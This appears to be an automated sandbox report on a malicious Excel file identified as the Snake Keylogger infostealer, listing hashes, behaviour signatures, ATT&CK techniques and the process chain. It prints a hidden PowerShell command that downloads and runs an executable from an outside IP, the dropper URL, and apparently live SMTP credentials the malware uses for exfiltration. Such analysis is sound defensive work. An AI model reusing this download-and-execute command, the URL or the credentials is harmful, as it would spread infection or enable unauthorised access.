Overview

overview

10

Static

static

8

4c6e2dca5d...d2.xls

windows7_x64

10

4c6e2dca5d...d2.xls

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    24-06-2021 11:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4c6e2dca5d80b3c2c6191266e3a07e5d668752d2.xls

  • Size

    118KB

  • MD5

    4214df1ddc5e781bd44ae657284476b9

  • SHA1

    4c6e2dca5d80b3c2c6191266e3a07e5d668752d2

  • SHA256

    bd91083ce01f04c11111c5c33b76552125e1961efbbe15010b1de43349a08843

  • SHA512

    00d945cf9d210c3b251351d6c6afd6ef9e50b873fe2f2e8da99cb41a79370a7ea7b02131ab4b081a332f732fb647484fd45cb988a0acd46195dac09db93c63a5

Score
10/10
snakekeyloggerkeyloggerstealer

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://212.192.241.94/news/IMG_1081007003xls.exe

Extracted

Family

snakekeylogger

Credentials

  • Protocol:     smtp
  • Host:
    nobettwo.xyz
  • Port:
    587
  • Username:
    saturn1@nobettwo.xyz
  • Password:
    O^1)7]oEv=*a

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4c6e2dca5d80b3c2c6191266e3a07e5d668752d2.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:360
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Public\Documents\drivehold.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h Start-BitsTransfer -Source http://212.192.241.94/news/IMG_1081007003xls.exe -Destination C:\Users\Public\Documents\fieldwith.exe;C:\Users\Public\Documents\fieldwith.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Users\Public\Documents\fieldwith.exe
          "C:\Users\Public\Documents\fieldwith.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1796
          • C:\Users\Admin\AppData\Local\Temp\fieldwith.exe
            C:\Users\Admin\AppData\Local\Temp\fieldwith.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fieldwith.exe
    MD5

    103ef5b9b04a1bb72a1feb10997e0ef0

    SHA1

    8b9a31bdbbef91862dcbed5546372f2f0800a5df

    SHA256

    7f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947

    SHA512

    604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\fieldwith.exe
    MD5

    103ef5b9b04a1bb72a1feb10997e0ef0

    SHA1

    8b9a31bdbbef91862dcbed5546372f2f0800a5df

    SHA256

    7f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947

    SHA512

    604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b

    Download Submit
  • C:\Users\Public\Documents\drivehold.bat
    MD5

    2cb6cb6243eb0fc50985967f9885c1ac

    SHA1

    480c54b6553861251d0db5aa7834dc129cfef077

    SHA256

    52328ee7bd27a482be1a0f466912ed1b5a0bb2c6985c3a3d90969bf2d89cb20a

    SHA512

    0a281f282a9afca0466c438132139637a6f2aa741b76c112c6bd0101355c885296cf3c7dce1c48e453e5db579a2172cffe4d724bf170b34666522e7640dd15dd

    Download Submit
  • \Users\Admin\AppData\Local\Temp\fieldwith.exe
    MD5

    103ef5b9b04a1bb72a1feb10997e0ef0

    SHA1

    8b9a31bdbbef91862dcbed5546372f2f0800a5df

    SHA256

    7f3ca9e8e9f6aaab9b8151f262a20dff03d53a437e689cb1c9a937349051e947

    SHA512

    604bcbbca508f6fd1d95d5137b885be41c761a85c32e32aa836e4ea57560f644f803897fd786e6367a16c3dc74318388ec334fe75894ae01b45fcdc76f50293b

    Download Submit
  • memory/360-59-0x000000002FEB1000-0x000000002FEB4000-memory.dmp
    Filesize

    12KB

    Download
  • memory/360-60-0x0000000070E11000-0x0000000070E13000-memory.dmp
    Filesize

    8KB

    Download
  • memory/360-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/360-109-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1712-67-0x0000000004700000-0x0000000004701000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-66-0x0000000000F30000-0x0000000000F31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-69-0x0000000000FE2000-0x0000000000FE3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-70-0x0000000002580000-0x0000000002581000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-71-0x0000000005300000-0x0000000005301000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-74-0x0000000005680000-0x0000000005681000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-79-0x00000000056C0000-0x00000000056C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-80-0x0000000006250000-0x0000000006251000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-87-0x00000000061B0000-0x00000000061B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-88-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-89-0x00000000055C0000-0x00000000055C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1712-64-0x0000000000000000-mapping.dmp
    Download
  • memory/1712-65-0x0000000075451000-0x0000000075453000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1712-68-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1796-95-0x0000000000820000-0x000000000086E000-memory.dmp
    Filesize

    312KB

    Download
  • memory/1796-100-0x0000000004DA0000-0x0000000004E09000-memory.dmp
    Filesize

    420KB

    Download
  • memory/1796-94-0x0000000004D60000-0x0000000004D61000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1796-92-0x0000000000C10000-0x0000000000C11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1796-91-0x0000000000000000-mapping.dmp
    Download
  • memory/1968-62-0x0000000000000000-mapping.dmp
    Download
  • memory/2044-102-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/2044-103-0x000000000042049E-mapping.dmp
    Download
  • memory/2044-106-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/2044-108-0x0000000004D50000-0x0000000004D51000-memory.dmp
    Filesize

    4KB

    Download